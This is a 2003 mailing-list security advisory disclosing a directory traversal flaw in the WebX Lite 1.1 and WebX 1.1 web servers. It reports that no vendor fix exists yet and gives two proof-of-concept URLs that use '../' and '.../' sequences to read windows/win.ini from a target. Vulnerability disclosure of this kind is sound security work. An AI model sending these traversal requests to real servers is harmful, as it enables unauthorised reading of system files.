hello,

i am sending you a security advisory for WebX lite 1.1 web server.

----

-=- Freedom of Voice - Freedom of Choice =-

------------------------------------------------------------------
http://members.lycos.co.uk/r34ct/  security advisory
------------------------------------------------------------------
                        

dr_insane - dr_insane@pathfinder.gr
September 8, 2003



Vunerability:
----------------
1) Directory Traversal attacks

Product:
--------
WebX Lite 1.1 web server
WebX 1.1 web server

Description of product:
-----------------------
Using WebX Lite could not be simpler. First set the basic parameters of a web server, choose the Server Port and the Virtual Path where you web pages are located. Then start the server. That is it.

You can easily add web based administration/configuration, client access, and reporting features to existing applications while reusing existing subroutines, functions and classes. And the best part, you can do all this while still working in the development environment of your choice, whether it is Visual Basic, Visual C++, Delphi, or any environment that supports ActiveX controls.


VUNERABILITY / EXPLOIT
======================

where to start...


1) http://[target]/../../../../../../../../../../windows/win.ini
2)http://[target]/.../.../.../.../.../.../.../windows/win.ini


Local:
------
not realy

Remote:
-------
real bad



Vendor Fix:
-----------
Not yet

Vendor Contact:
---------------
http://www.futurewavetech.com/
support@futurewavetech.com


Credits:
--------
dr_insane
http://members.lycos.co.uk/r34ct/


_______________________________________________


 
 


----------------------------
Dr_Insane
members.lycos.co.uk/r34ct/
----------------------------

______________________________________________________________________________________
http://mobile.pathfinder.gr - Pathfinder Mobile logos & Ringtones! 
http://www.pathfinder.gr - Δωρεάν mail από τον Pathfinder!